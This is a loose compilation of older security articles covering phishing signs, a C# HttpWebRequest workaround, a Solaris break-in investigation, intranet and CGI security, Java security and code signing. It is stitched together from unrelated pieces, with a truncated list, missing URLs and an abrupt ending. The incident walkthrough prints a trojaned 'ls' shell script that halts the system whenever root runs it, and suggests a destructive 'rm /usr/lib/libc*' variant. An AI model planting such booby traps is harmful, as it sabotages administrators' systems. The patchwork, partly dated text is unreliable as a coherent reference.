How to spot a phishing email

Phishing and spoofed emails aim to obtain your secure information, passwords, or account numbers. These emails use deceptive means to trick you, such as forging the sender's address. Often they ask the reader to reply, call a phone number, or click a web link, all in order to steal personal information.


1. The email has improper spelling or grammar
This is one of the most common signs that an email isn’t legitimate. Sometimes, the mistake is easy to spot, such as ‘Dear eBay Costumer’ instead of ‘Dear eBay Customer.’

Others might be more difficult to spot, so make sure to look at the email in closer detail. For example, the subject line or the email itself might say "Health coverage for the unemployeed." The word unemployed isn't exactly difficult to spell, and any legitimate organization has editors who review its marketing emails carefully before sending them out. So when in doubt, check the email closely for misspellings and improper grammar.

Cyber Security

Cyber security is definitely one of those areas where you need to evaluate the validity of any information you find online before accepting it. The figures about the prevalence and under-reporting of cyber attacks come from a 2010 CyberSecurity Watch survey carried out in the US by a number of organisations, including the US Computer Emergency Response Team. The survey states that 'the public may not be aware of the number of incidents because almost three-quarters (72%), on average, of the insider incidents are handled internally without legal action or the involvement of law enforcement.'

401 Unauthorized Request workaround when using HttpWebRequest

If you have ever encountered the dreaded "401 Unauthorized" error when trying to get the HTML from a URL on the same domain (because the application pool runs as a different user than the one logged in via Windows authentication), this short snippet shows how to work around the issue:

System.Net.HttpWebRequest request = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(url);
request.Credentials = System.Net.CredentialCache.DefaultCredentials;
request.AuthenticationLevel = System.Net.Security.AuthenticationLevel.MutualAuthRequested;

using (System.Net.HttpWebResponse response = (System.Net.HttpWebResponse)request.GetResponse())
{
    if (response.StatusCode == System.Net.HttpStatusCode.OK)
    {
        System.IO.Stream receiveStream = response.GetResponseStream();
        System.IO.StreamReader readStream;

        // Fall back to the default encoding when the response declares no character set.
        if (response.CharacterSet == null)
            readStream = new System.IO.StreamReader(receiveStream);
        else
            readStream = new System.IO.StreamReader(receiveStream, System.Text.Encoding.GetEncoding(response.CharacterSet));

        string data = readStream.ReadToEnd();
    }
}

Hacked: Now What?

You have that funny feeling that something is not right. One of your admins reported that his Unix box keeps rebooting in OpenWindows. You sit down at the box, type some commands, and wham, it reboots again. This doesn't look like a bug; you've been hacked! Now what do you do?

How to Prepare.

Protecting your systems is only part of information security. Preparing for the inevitable is another. Sooner or later, one of your systems will be compromised. What then? Backups are one critical part of recovery (nothing beats a total restore); however, a full restore should be considered a last resort.

Here we will be discussing the knowledge and tools necessary to identify a compromised system, ascertain what the hack was, and recover the system without a full restore. The first part of this article covers tools and preparations you should make now. The second part is a step-by-step example using these preparations. Although this article is by no means exhaustive, I hope to give you some basic ideas of where to start.


Logging

Logging is one of your most powerful tools in recovering from a security incident; logs are your friends. With extensive logging, you can potentially track the intruder's actions, identify what has been compromised, and fix the system. Your goal is to cover various sources of logging, so you are not dependent on a single source of information.

The first place to start is /etc/syslog.conf. This file is the central command of logging; you control the various logging functions here. At boot, /usr/sbin/syslogd reads this config. By editing this file, we can configure how the system logs.

The first thing we want to log is all inetd connections, such as telnet, ftp, and rlogin, to the file /var/adm/inetdlog. This way, whenever someone connects to the system, you have a log of which IP connected and when. First, create the file /var/adm/inetdlog using the touch command. Second, add the following line to /etc/syslog.conf (make sure the fields are separated by tabs, not spaces):

daemon.notice           /var/adm/inetdlog

Now, restart /usr/sbin/syslogd with kill -HUP; this enables logging to inetdlog. We are not done yet. For this to work, inetd has to be running with both the -s and -t parameters. In the last line of /etc/rc2.d/S72inetsvc, edit as follows:

/usr/sbin/inetd -s -t

Now all inetd connections will be logged. For the -t parameter to take effect, you can either reboot the system, or kill /usr/sbin/inetd and then manually relaunch it with the -s and -t parameters. The only problem now is that we are depending on a single source of information. If your system were compromised, the intruder could easily modify the logging on that system. To protect against this, we have all logging sent to an additional logging host, giving us two sources of logging. For this, we add another line to /etc/syslog.conf:

daemon.notice           @logger

For the truly paranoid, we can add one more layer of protection: have all logging output sent to a printer. This way, the only way someone could compromise the logging is by gaining physical access to the printer. For this, we add one last line to /etc/syslog.conf:

daemon.notice           /dev/printer
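Taken together, the logging changes sketched above amount to the following recap (the logging host name `logger` is an example, and the syslog.conf fields must be tab-separated):

```shell
# additions to /etc/syslog.conf (tab-separated fields):
#   daemon.notice	/var/adm/inetdlog
#   daemon.notice	@logger
#   daemon.notice	/dev/printer

# create the local log file and make syslogd re-read its config
touch /var/adm/inetdlog
kill -HUP `cat /etc/syslog.pid`

# and in the last line of /etc/rc2.d/S72inetsvc, enable connection tracing:
#   /usr/sbin/inetd -s -t
```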

There are two other logs we want to ensure are functioning, /var/adm/sulog and /var/adm/loginlog. Sometimes these logs are not enabled by default. sulog records all su attempts, regardless of whether they succeed. loginlog records any login that fails five consecutive times. Both logs can be enabled by touching the following two files:

touch /var/adm/sulog
touch /var/adm/loginlog

The last step for logging is permissions. Solaris (even 2.6) has the nasty habit of setting bad permissions in /var/adm; bad in that most logs can be read by everyone, and some can even be written by everyone. Keep in mind that /var/adm/loginlog and /var/adm/log/asppp.log keep passwords in plaintext. The best thing to do is chmod 750 * in /var/adm.


A Trusted Toolkit

This will be our second tool for dealing with a compromised system. When you access a compromised system, you can't rely on the environment or the files; the intruder most likely altered both. To protect yourself, create a floppy (or CD-ROM) that contains critical executables. These are the executables you will be using in the future. The first thing you do on a compromised system is set your $PATH to the floppy; that way you are absolutely sure you are executing uncorrupted files. Examples of critical executables include:

/usr/bin/ls           /usr/bin/grep
/usr/bin/find         /usr/bin/more
/usr/bin/truss        /usr/bin/vi

Also, keep a printout of all setuid files (mode 4000) and all hidden files (.*) on the floppy. This way you can determine whether any new hidden or setuid files have been added to the compromised system.
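That comparison can be sketched as a small shell helper; the file names and the diff step are illustrative, not from the article:

```shell
# baseline -- record the setuid and hidden files under a directory tree
# so they can later be diffed against a possibly compromised system
baseline() {
  find "$1" -type f -perm -4000 -print | sort > suid.baseline
  find "$1" -type f -name '.*' -print | sort > hidden.baseline
}

# on the clean system:   baseline /
# later, from the trusted floppy:
#   find / -type f -perm -4000 -print | sort | diff suid.baseline -
```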

Now What?

Now, back to that system that kept rebooting in OpenWindows. If you remember, one of your admins reported his/her system is rebooting randomly in OpenWindows, specifically if you are root. You decide to verify for yourself. You reboot, go into OpenWindows, and do nothing: nothing happens after 10 minutes of staring at the screen. You decide to look around. After typing some basic commands, wham, the system reboots. Yep, this does not look like a bug; you have been hacked AND booby-trapped. NOW WHAT? Here is one possible approach to troubleshooting the system.

Being the ever diligent admin, you already read an article similar to this one, so you have both logs and floppy ready. So, where do we start? Logs are a great place to start, but first: never trust the environment. Assume that the intruder has changed it (he/she probably already has).

You reboot the system, but escape out of OpenWindows as it starts up. You mount your handy floppy, set the path so it points ONLY to the floppy, and then confirm your environment with the env command. This way you know that you are executing trusted files. We are now ready to start investigating the system.

You decide to start with basic checks of critical files. You begin with the command

find / -user root -perm -4000 -print

You compare all the suid files to the ones on your floppy. Everything checks out; there are no new suid files. Now let's see if any new hidden files have been added. You then try:

find / -name ".. " -print &
find / -name ".*" -print

No, everything checks out; there have been no new hidden or suid root files added. You decide to move on to the log files, specifically /var/adm/messages; again, nothing suspicious. So far everything checks out. You decide to get daring and try out the binaries on the system; again, nothing. The system seems to be working just fine, as long as you are not in OpenWindows.

You decide to recreate the problem: you launch OpenWindows. From OpenWindows, you start poking around without using your floppy, then wham, it reboots! Aha, progress: the system reboots, but only when you use the system binaries while in OpenWindows. As the system reboots again, you once again cancel out of OpenWindows. You reset your environment back to the floppy. You decide to try OpenWindows again, except this time we will use our buddy truss (we can trust truss since we are using our floppy).

#truss -f -t exec -o /var/adm/truss /usr/openwin/bin/openwin

You go into OpenWindows and start poking around in the OpenWindows environment. Wham, sure enough, the system reboots, but you have the culprit with truss! After the reboot, using your floppy, you cat your truss file located at /var/adm/truss. Aha, you find the culprit at the end of the truss file: the system is executing halt.

So, you have found the hack: something is executing halt in OpenWindows. The system has been booby-trapped, but how? For one last time, you launch openwin, and from there you take a look at the environment. You notice that your path has changed: /usr/openwin/bin has been added to the beginning of the path. Any command you execute will be searched for there first. Now you remember: openwin adds itself to the beginning of your path by default!

Using our trusted binaries by setting $PATH to our floppy, we cruise over to /usr/openwin/bin. You grep for "halt", and sure enough, you have found the hack. The intruder has left a booby trap: he/she created a new file, /usr/openwin/bin/ls (see Listing A).

Now, let's find out who did it; this is where our logging comes in! The first log we want to look at is /var/adm/inetdlog. Here we find, by IP address, everyone who has connected to the server. We are looking for any IP addresses that should not be there, potentially with the same time/date stamp as /usr/openwin/bin/ls. Sure enough, you find an IP address that looks suspicious. Now, let's find out what that user's login was. With the suspicious IP address, you can map the intruder's login to the IP with the "last" command, piping its output into grep for the IP address.

Sure enough, you got him, but what concerns you is that it's the login of one of your admins. You take a look at /var/adm/loginlog, but there are no failed attempts. It looks like the intruder knew the password for the login ahead of time. You take a look at /var/adm/sulog; once again, there are no failed attempts, so this user didn't have to guess any passwords. It looks like one of your admins has been careless with his/her passwords. How you handle this problem is a topic for another article.

There are a variety of other tools and techniques to use, such as checksums, Tripwire, etc. The ideas mentioned here are just the first step in that preparation.

#cat /usr/openwin/bin/ls
if [ "$LOGNAME" = "root" ]
then
        (sleep 5; /sbin/halt) > /dev/null 2>&1 &
else
        /usr/bin/ls "$@"
fi

A basic script that ruins your day. Imagine if rm /usr/lib/libc* were in there!


Website Security – Confidential Information?

Security doesn't seem to be such a major issue on a corporate intranet as it is on the public Internet. After all, this network is not public. But business considerations can make security an important issue with which to deal.

If security on an intranet is centralized, it is usually controlled by a corporate organization. Many corporations currently do not have centralized security for their intranets, which is unfortunate as much of the hacking done today occurs on private rather than public networks.

If your corporation does have central control of intranet security, those in charge will have security standards that your application must meet before you can place it on the intranet. As with other corporate organizations, you will probably have to plan in advance to work with the corporate security department. Some intranets might even use centrally administered security for logon passwords and other security issues.

Most technicians find that security concerns often conflict with the technical considerations of their applications. Technical advances often outstrip the security department’s ability to accommodate them. You might devote your time to security modules that seem overly burdensome and might find that you are unable to implement some technologies on the intranet because of security requirements and concerns. But by planning ahead, you can prepare time in your design and construction schedules to accommodate these security needs.

Protecting Confidential Material

Another concern in intranet applications is protecting confidential material. It is true that your application is operating over corporate resources, but it can pass data that should not be seen by unauthorized employees, contractors, customers, and others who have access to the intranet. Many confidentiality issues discussed in Chapter 1 for the Internet also can be applied to intranet applications. Because the intranet and Internet are both TCP/IP networks, they have the same limitations and problems when plain text is transmitted across them.

One issue that requires a balancing act is the need for confidentiality versus the availability of information for the corporate community. Security and confidentiality issues are always cost-benefit tradeoffs.

Remember also that you might have to apply local, state, and even national laws to the information in your application even though it passes over your private intranet. Personnel and financial applications are often subject to these laws. Another interesting consideration is that an intranet can span political jurisdictions (states, provinces, or even countries), so various segments of it might be subject to different laws when it comes to the confidentiality of the information carried on them.

Security Versus Availability

Maintaining security and confidentiality is a juggling act. On one side is the need to keep information secure and confidential, and on the other side is the need to make information available. There are no hard-and-fast rules for managing this dilemma. You could write an entire book on security and confidentiality issues. In a single chapter, I can provide only some guidelines by which you can develop your application.

You will need to examine two things to determine the level of security that your application requires. First, determine how sensitive your data is. Some data is easy to classify. For example, if you are developing an organization chart application that will display information about your employees such as social security numbers, home addresses, and phone numbers, you are dealing with sensitive information that should be protected from unauthorized access. Other information is more subtle. Let's say you're working on a marketing application that will enable your managers and sales representatives to share information about current and potential customers. You might think that this information doesn't need to be very tightly secured; after all, this is your internal network, your intranet. This brings us to the second consideration in the security versus availability dilemma.

Stop for a moment to consider the people who have access to your intranet. If you are part of a company of any size, you probably have all sorts of people in your intranet:

  • Employees
  • Temporary help
  • Consultants and vendors
  • Customers

Would you want all of these people to look at your data? Even subtle data can have an impact on your business. Let’s say you want to put your company newsletter online. Along with those announcements of company activities, the local bowling league scores, and the picture of the employee of the month is an article about your marketing strategy. If consultants, vendors, or customers had access to this information, it could give them (or their other customers) a competitive advantage in the future.

If your intranet has a mix of people on it, consider giving non-employees IDs that are easily identified, perhaps with special characters in certain positions. Secure all confidential or potentially damaging information with secured Web servers. Require access via ID and password. Your application can detect the special IDs and deny access to the information.

One interesting fact is that very few corporations have implemented internal firewalls on their intranets. You might consider implementing a firewall, especially if you are designing a sensitive divisional or departmental application that needs to be isolated from other divisions or departments.

How do you decide the security issues? Only you can do so. Look at the data, and then give some thought about the people who are using your intranet. If you have any doubt, secure the information. A few tips follow.

  • If you have any doubt about the security of your intranet, run your application on a secure server and pass information only to users with secure browsers to ensure that your sensitive information will not travel over your network as plain text.
  • Develop a central security system that can identify the various types of users by user ID and password.
  • Accept connections only from known, secure IP addresses. Make sure that machines that are accessible to unauthorized personnel cannot access your application. Use filters on your router, if appropriate, or refuse to send pages from your server to unknown IP addresses.

Change Passwords Periodically

Given a choice, most of us would select a password that was easy to remember, never change it, and use the same password everywhere. Your corporate security group probably has standards much stricter than that, for a reason. Easy passwords that never change are easy to crack, and once passwords are cracked, hackers can use them again and again.

Never send passwords via electronic mail unless the message is heavily encrypted. In fact, just to be safe, never send passwords through electronic mail, period!

If you must use passwords in your application, change them periodically. Once a month is typical, though your application might require more or less frequent changes. If you use the HTTP password capability, you will want a separate process for updating passwords. One way is to use corporate security files to obtain passwords. Another is to alter the passwords periodically yourself and distribute them to your users via a secure mechanism.
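On many UNIX systems, password aging can enforce the monthly change suggested above. A sketch (the username and intervals are examples, and the command requires root):

```shell
# expire alice's password every 30 days, warning her 7 days in advance
passwd -x 30 -w 7 alice
```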

Making Secure Scripts for your Website


When you are programming on the Internet, never skip security. People really do crack Internet systems. If you are on the Internet long enough, someone will try to break into your system. Even the U.S. Department of Justice has had its Web site broken into. By taking appropriate steps to secure your systems and your programs, you (hopefully) will be able to avoid break-ins. Take the word of experience: The time spent up front is well worth it. A single security incident can easily eat up weeks of your time and potentially even millions of dollars if your systems are critical or have confidential information.

If setting up security is going to take an insane amount of time and money, you need to do a risk assessment to determine whether you should go ahead and do it. In a risk assessment, you look at the likelihood of a security breach and the cost of such a breach to your organization (remembering to include indirect factors such as loss of trust by your clients and related lost business) versus the cost of securing your system. Often, this analysis makes the answer obvious.

No security system is ever 100 percent secure. This doesn’t mean that you should just give up on security. Your goal is to secure your system by spending less money on security than a break-in would cost to fix.

People might try to break into your system or program for a variety of reasons. Some do it for fun. Others, unfortunately, do it to steal information or damage your machines. Therefore, security is almost always important. This is especially true of your Internet programs. Because they are likely one of the first things that will be attacked, spend some time thinking about the security implications of any code you are going to deploy. If you are an Internet novice, show your design and code to an Internet expert to have him verify that your program appears to be secure.

You need to remember that your Internet programs should try to deal with security on other fronts. In particular, do your best to defend against attacks from the other employees at your workplace. More security breaches are caused by employees than by crackers out on the Internet. Though you think you can trust your co-workers, keep the number of people who have access to bypass the security mechanisms to an absolute minimum. This strategy improves security and accountability.

General Internet Security

When you look at Internet security, you must look from the bottom of the protocol stack (the physical wire) all the way up to end-user applications. Any level can be attacked; therefore, every level needs some security mechanisms in place. This section mainly covers the potential weaknesses of the security mechanisms, so that you can be expecting them and possibly can deal with them in your Internet programs.

One common kind of Internet attack is to eavesdrop on packets as they cross the network, whether on the Internet or your local LAN. Networking people use the term sniffing instead of eavesdropping, however. Just about any computer can be turned into a sniffing device. The scariest thing is that any cracker who becomes root on your UNIX systems can use your UNIX box from her remote cracking site to see packets on your network. By doing this, she can gain more passwords to get into even more machines.


You will notice that the word cracker is used instead of hacker. The term hacker has two meanings. Originally, it was (and still is in many circles) a positive term, meaning “someone who plays with the internal workings of a system.” The media then came along and twisted it to mean “someone who breaks into computer systems.” Many people have recommended the term cracker for the second definition. It’s a good fit, as a safe cracker is comparable to a computer cracker.

Besides preventing the cracker from getting root on your system, you can do a few things to minimize the threat of this attack:

  • Don’t use Ethernet networks for your LAN if security is your number one goal because eavesdropping on an Ethernet is easy to do. However, Ethernet is a very good, inexpensive technology for LANs in general.
  • If you do use Ethernet, the best thing to do from a security standpoint is to use switching hubs instead of repeating hubs. The advantage is that a single machine on a switched hub doesn't see traffic on the network that isn't supposed to go to that machine.
  • The final approach is to encrypt traffic as it goes across your LAN or the Internet. This is very labor-intensive and shouldn’t be done lightly. (You will learn much more about encryption later in this chapter.)

One organization that can potentially help you is CERT (the Computer Emergency Response Team). CERT makes announcements about bugs that exist in Internet-related software and where to acquire patches to solve them. If patches aren't available, it usually at least suggests some workarounds. It also maintains some security tools on its FTP site. You might want to take a look before starting on Internet programming to make sure that the tools you use in your development are secure.

Web Security

The Web can be fairly secure, completely insecure, or anywhere in between, depending on how it’s configured. Because different Web servers have different security mechanisms, the types of Web security available can range widely from system to system. Most of the popular Web servers (for example, NCSA, Apache, and Netscape Communications/Commerce Server) offer reasonably good security if configured correctly.

One of the security options controls whether someone can upload files via the PUT command. I strongly recommend turning off PUT unless you absolutely need it and fully understand what it’s doing. You can still get information via the Common Gateway Interface (CGI). CGI is another optional feature to which you might want to restrict access on the server. Poorly written CGI programs can create large security holes, as discussed later in this chapter.

If you need advanced security, you can run one of the Web servers that offers encryption capabilities, such as the Apache/SSL, Open Market Secure Web Server, NCSA, or Netscape FastTrack Server. It won’t solve all of your security problems, but it definitely can help, especially against packet sniffing attacks.

General Programming Security

Over the 20-plus years that the Internet has been in existence, many security bugs have arisen in Internet programs. The same types of security bugs, however, tend to crop up over and over again.

Preventing Buffer Overflow

The most common bug in Internet programs involves buffers. Internet programs must be prepared to accept input of any length; the mistake programmers commonly make is to assume that the input has a maximum length and write it into a fixed-length buffer, which the input can then overflow. Even this can be stopped automatically if your compiler inserts code into the executable to make sure that buffer (array) boundaries aren't crossed. However, in C, the traditional Internet programming language, array boundaries aren't checked.

A cracker can exploit this problem by overflowing the buffer. The excess input overwrites memory beyond the end of the buffer, and by this overwriting, the cracker can have the target system execute his own code. The hard part of this attack for the cracker is that he must change his attack for every different type of machine, if not every version of a particular operating system.

To prevent this problem, you must make sure that your buffers don’t overflow under any circumstance. The first solution is to always dynamically allocate your buffers as needed. Some languages (for example, Perl) can automatically do this for you. Another approach is to look at the size of the input; if it’s too long, you treat it as an error or you truncate it. Each of these methods works if implemented correctly, but you need to decide which is the best method for your application.
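The "treat it as an error" option can be sketched in shell terms (MAX is an example limit, not a value from the text):

```shell
# check_len -- reject over-long input before using it.
MAX=256
check_len() {
  if [ "${#1}" -gt "$MAX" ]; then
    echo "error: input too long" >&2
    return 1
  fi
  return 0
}
```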

Preventing Shell Command Attacks

Another common mistake is to allow a cracker to send commands to a shell. This problem occurs when the program accepts some input and then uses it in a shell command without performing adequate checking. On UNIX, it's absolutely critical to eliminate some special characters, such as backticks (`) and quotes ("). The characters in UNIX that are safe to pass to a shell are the alphanumerics plus underscore (_), minus (-), plus (+), space, tab, forward slash (/), at (@), and percent (%). For DOS and other systems, a different set of characters might be valid. In the CGI section of this chapter, I come back to this security problem and explain some ways to solve it for CGI programs.
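A sketch of that check in shell terms: delete every character from the safe list and reject the input if anything remains (the function name is mine):

```shell
# sanitize -- accept a string only if every character is in the safe set
# listed above: alphanumerics plus _ - + space tab / @ %
sanitize() {
  leftover=$(printf '%s' "$1" | tr -d 'A-Za-z0-9_+@%/ \t-')
  [ -z "$leftover" ]            # succeeds only if nothing unsafe remains
}
```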

Changing the Root Directory

One way to minimize all Internet security programming problems is to use a chrooted environment on a UNIX system to run the server program. If you are not on UNIX, this method is not possible and you might want to go on to the next section. The name comes from the chroot (change root) command in UNIX, which changes the root directory for the program. Setting up this kind of environment correctly is somewhat troublesome, but the security benefits can be huge if security is critical for your program. If a cracker does break through your program's security, he will be in a "rubber room" environment on your system, without access to the real operating system files or anything else you don't want to expose. This isolation will enormously reduce his ability to cause damage.
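A minimal sketch of that chrooted setup; the jail path and server binary are hypothetical, and the commands require root:

```shell
# build a bare-bones jail and start the server inside it
mkdir -p /jail/bin /jail/lib /jail/etc
cp /opt/myserver/bin/myserver /jail/bin/

# copy in only the shared libraries the binary actually needs;
# ldd /jail/bin/myserver will list them

chroot /jail /bin/myserver
```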

If your program works with confidential or sensitive information, it’s critical that your Internet programs can keep that information out of the hands of people who shouldn’t see it. Beyond your program’s security, you need to protect the data from access outside of your program. For example, you might have a program that receives credit card numbers. If a cracker breaks into your system and becomes root, he then can look at the file where you have stored the credit card numbers. A solution to this problem is to keep all this data encrypted whenever you store it. (Before you ignore this occurrence as being unlikely, you should know that it has already happened to a major Internet service provider.)

It is a good idea to have your program keep an audit trail; sending this audit trail to a different machine (possibly via syslog) is also advisable. With this method, if the machine that runs your program is compromised, you still have the audit trail from which to recover (as well as a backup, hopefully). Audit trails also are good for finding program bugs and abnormal use patterns, which are often a sign of compromise or attempted compromise. On the negative side, some audit trails can use an enormous amount of disk space, and it can be hard to extract useful information from them.
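As a sketch of the syslog approach, a shell-level program might emit audit records like this (the tag `myapp`, the facility `local0`, and the host name `loghost` are example choices):

```shell
# write an audit record to syslog; syslogd can forward it off-host
logger -t myapp -p local0.notice "user=$LOGNAME action=update status=ok"

# on the application host, /etc/syslog.conf then forwards the facility:
#   local0.notice	@loghost
```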

Java Security

Java is probably the most secure of all of the Internet programming languages in existence; Java was built from the ground up to be ultra-secure. The Java security model is somewhat complex, but it incorporates security on several levels. If it were bug-free, it would be an extremely strong security mechanism that would greatly reduce worries about the security of running programs on the Internet. Unfortunately, so far a couple of bugs have been found in the security protection of the language, which would enable people to circumvent the security. The good news is that they are just bugs, not fundamental flaws in the design, and Sun is quickly addressing them. The other good news is that the bugs haven’t been exploited to cause damage.

Byte Code Verifier

The lowest level of security is the byte code verifier in the Java Interpreter, which implements the Java Virtual Machine. The byte code verifier makes sure that a Java program is valid and doesn’t perform any operations that might enable the program access to the machine underlying the interpreter. Checks performed include checking for code that will overflow or underflow the stack and code that tries to access objects that it isn’t allowed to access.

Sun is trying hard to make sure that its byte code verifier is totally secure. When other vendors release their implementations of the Java Virtual Machine, can you trust their byte code verifiers? I don’t have the answer to this question, but it’s something worth paying attention to.

The byte code verifier is invoked by the class loader (java.lang.ClassLoader). The class loader is responsible for loading classes from whatever source it needs, whether the local disk or across the network. The class loader protects a class from being replaced by another class from a less-secure source.

Security Manager

One level above the class loader is the Security Manager. The Security Manager implements the security policy for running Java programs. Stand-alone Java applications can set their own security policy by subclassing the Security Manager and installing an instance of it. Web browsers instantiate their own Security Managers, and applets aren’t allowed to modify them. Netscape Navigator, in particular, implements a very strict Security Manager: accessing the local disk is impossible from any class loaded from the network. With HotJava and AppletViewer, a class loaded off the network can access the local disk if the user allows it.

By modifying the Security Manager, you can change the way security is handled in your applications. With the Security Manager, you can control file access. You can control where network connections can be made. You can even control access to threads through the Security Manager.

Writing your own Security Manager is a very advanced topic, worthy of a book in its own right. Needless to say, I won’t cover it here. If you need some material on writing a Security Manager, the book Tricks of the Java Programming Gurus by Sams Publishing has several chapters on how to do it.

Many people are now talking about putting digital signatures on applets (digital signatures are covered later in this chapter). With this system, you will be able to know who wrote a particular applet. Then, if you trust the author, you can relax the limits that the Security Manager imposes. Watch for this technology; it will be important to you, because you probably will need to sign your applets at some point in the future.

JavaScript Security

Although JavaScript has the word Java in it, don’t expect the same level of security from it as from Java. JavaScript originally was called LiveScript and had nothing to do with Java. The name change was almost strictly a marketing ploy on the part of Netscape.

Java offers a multilevel security model that protects Java code from doing dangerous things, but JavaScript does nothing of the sort. Netscape simply tried to design a language with no dangerous commands. In Java, it’s possible to control the level of security by overriding the Security Manager; JavaScript offers no such flexibility.

JavaScript apparently wasn’t designed with security and privacy as primary design principles; if it was, they were poorly implemented. People have already managed to exploit features of the language to do things such as steal URL history and forge e-mail. Netscape is gradually trying to address these problems.

To be honest, many people doubt that JavaScript will ever be completely secure because of its design. In fact, I don’t feel comfortable with it personally, and I have disabled it in my copy of Netscape Navigator.

VBScript Security

When Java and, to a lesser extent, JavaScript burst on the scene, Microsoft had to strike back. It did so with Visual Basic Script (VBScript). VBScript is nothing more than Visual Basic with the parts that Microsoft saw as potentially dangerous ripped out of the language. The result, from a security point of view, is a language similar to JavaScript. Whether it’s secure is somewhat of a mystery at this time, because it hasn’t been widely deployed on the Internet. Many systems seem secure until enough people try to break them. We will just have to see how VBScript holds up.

CGI Security

You can look at CGI security from several angles. I’ll cover some of the specific programming problems first and then get around to some of the more global issues related to CGI scripts later.

Handling Input to a Shell

First, go back to the passing-commands-to-a-shell problem discussed earlier. Because Perl is the most commonly used language for CGI programs, let’s look at how to fix this problem in Perl. If the input should never be used in a shell command in any way, the version of Perl known as taintperl should be used instead of normal Perl. taintperl is included with the standard Perl distribution and doesn’t enable any input to be used in a shell command unless you go through a troublesome process of untainting it first.

However, in many cases you need to use some of the input as part of a shell command. If you write your own error-checking routines, you have two choices:

  • Look for characters you know you can trust, and treat anything else as an error.
  • Look specifically for characters you know you can’t trust.

The first method is much safer; with the second, you might miss a dangerous character.
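The first, safer approach, shown here in Java rather than Perl, accepts only characters known to be harmless. The particular allowed set (letters, digits, dot, underscore, dash) is an illustrative assumption that you would tailor to your application:

```java
public class ShellInput {
    // Accept only characters on the trusted list; everything else is an
    // error. The allowed set below is an illustrative choice.
    public static boolean isSafe(String input) {
        return input.matches("[A-Za-z0-9._-]+");
    }

    public static void main(String[] args) {
        System.out.println(isSafe("report.txt"));   // true: plain filename
        System.out.println(isSafe("x; rm -rf /"));  // false: shell metacharacters
    }
}
```

Anything containing shell metacharacters (semicolons, pipes, backquotes, and so on) fails automatically, because those characters were never on the trusted list.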

If you think this is too much trouble, you’re right-but you have an easy alternative. Libraries are available that check the input for you automatically, as well as parsing it into an easy-to-use format. For Perl 4, CGI-LIB is an excellent library. It’s available at the following address:

Don’t be confused by the fact that it’s included with the NCSA httpd distribution. It should work with any UNIX-based Web server, and possibly with any Web server supporting CGI on any platform that has Perl. For Perl 5, a similar library is available at the following address:

CGI Scripts and userid

If you are writing CGI programs and they don’t run, the problem might be the security setup on your Web server. Many system administrators allow only specific people to execute CGI scripts in certain directories, to minimize the security exposure. The reason is that CGI scripts typically run under the userid of the Web server, so a poorly written program (by any user) that can create files can damage the Web server. If the Web server runs as root on UNIX or administrator on Windows NT, the damage could be even greater; it is never a good idea to run a Web server as either of these two user IDs. In any case, if your script doesn’t run at all, talk to your Web administrator.

To solve the problem just discussed, many Web administrators install a program called CGI-WRAP. CGI-WRAP runs on a UNIX Web server and is a setuid program that performs a variety of beneficial tasks:

  • First, it runs user-written CGI scripts as that user. This scheme protects the Web server from these programs.
  • Second, it eliminates all the dangerous characters previously discussed, before the CGI script ever runs, so that the system administrator doesn’t need to worry about whether users are writing scripts in a secure fashion.
  • It also has an option to automatically kill off CGI scripts if they use too much CPU time.

If you are on a system using CGI-WRAP, you need to use different URLs, and you might need to modify your program slightly. Find some local document or talk to your Web administrator to find out how.

A common and deadly mistake that many Web administrators and programmers alike have been making recently is to place a copy of Perl itself in a directory from which CGI programs can execute. A knowledgeable cracker can use this mistake to do just about anything he wants to your system. The best strategy is to always keep Perl outside any directory from which the Web server can execute programs.

Internet Security Through Code Signing

As you’re probably aware (and if you aren’t, you should be!), computer viruses, Trojan horses, and other assorted malicious code pose a major security threat to networked systems. On a constantly changing and growing global network the size of the Internet, it’s simply impossible to keep viruses and their brethren at bay. The truth is, infected code of one form or another runs rampant on many systems, and code safety is a major concern for developers and for users of Internet applications (including ActiveX controls).

For example, it’s possible that a perfectly harmless-looking ActiveX control, executable file, or code from unknown sites or authors could wipe out a user’s entire system before he knew what hit him! Worse yet, perfectly harmless code created by one programmer could be tampered with and altered by some other, malicious programmer after its release, possibly wreaking havoc on the systems of users who download and execute the altered code!

Addressing Security Issues

There are two basic ways to address the Internet security issue:

  • Sandboxing. This term refers to restricting an application to a certain set of APIs, excluding those that would enable file I/O and other potentially dangerous function groups that could alter or destroy data on a user’s system. Because the restricted API keeps the code from doing damage, this method doesn’t require you to trust the application or its source.
  • Shrinkwrapping. This security method uses specially encrypted digital signatures. A shrinkwrapped product verifies signed code with a private-key/public-key verification scheme. Before any signed code is allowed to execute on a user’s machine, its digital signature is verified. This verification process ensures that the code hasn’t been tampered with since the code was signed, and it also ensures that the code is from a known, authenticated source.
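The tamper-detection half of this scheme rests on a cryptographic digest: change one byte of the code and the digest changes completely. Here is a minimal sketch using the standard java.security API; SHA-256 is a stand-in for whatever hash a real signing tool uses, and the class name is invented for illustration:

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

public class CodeDigest {
    // Hash the code down to a fixed-length digest.
    public static byte[] digest(byte[] code) {
        try {
            return MessageDigest.getInstance("SHA-256").digest(code);
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);
        }
    }

    // A verifier that holds a trusted digest can detect any tampering:
    // even a one-byte change to the code produces a different digest.
    public static boolean unmodified(byte[] code, byte[] trustedDigest) {
        return MessageDigest.isEqual(digest(code), trustedDigest);
    }

    public static void main(String[] args) {
        byte[] original = "MOV AX,1".getBytes(StandardCharsets.UTF_8);
        byte[] trusted = digest(original);
        byte[] tampered = "MOV AX,2".getBytes(StandardCharsets.UTF_8);
        System.out.println(unmodified(original, trusted)); // true
        System.out.println(unmodified(tampered, trusted)); // false
    }
}
```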

Digital Code Signing

Digital code signatures are used to verify code authenticity and also to identify and provide details about the publisher of the code. Digital signatures are an industry standard supported by many Web browsers. Such browsers enable a user to choose whether to download and execute code of unknown or suspicious origin.


For the most up-to-date information about digital code signing, an industry standard, access the Web site of the World Wide Web Consortium (W3C) at this URL:

Signed Code and Code Certificates

As an independent software vendor (ISV) who wants to use the benefits of digital code signatures in your applications, you must obtain a certificate from a certificate authority (CA), a third-party company known and trusted by the industry. After a CA verifies that you comply with W3C policies, the CA issues you a digital certificate file for use in code signing. The certificate file contains important information, including the name of the software publisher, your public encryption key, the name of the CA’s certificate, and more.

Public and Private Encryption Keys

You create both the public and private keys used to encrypt the digital signature block that verifies your code’s authenticity. The private key remains your little secret; the public key must be checked by the CA to ensure that it’s unique.

Signing Your Code

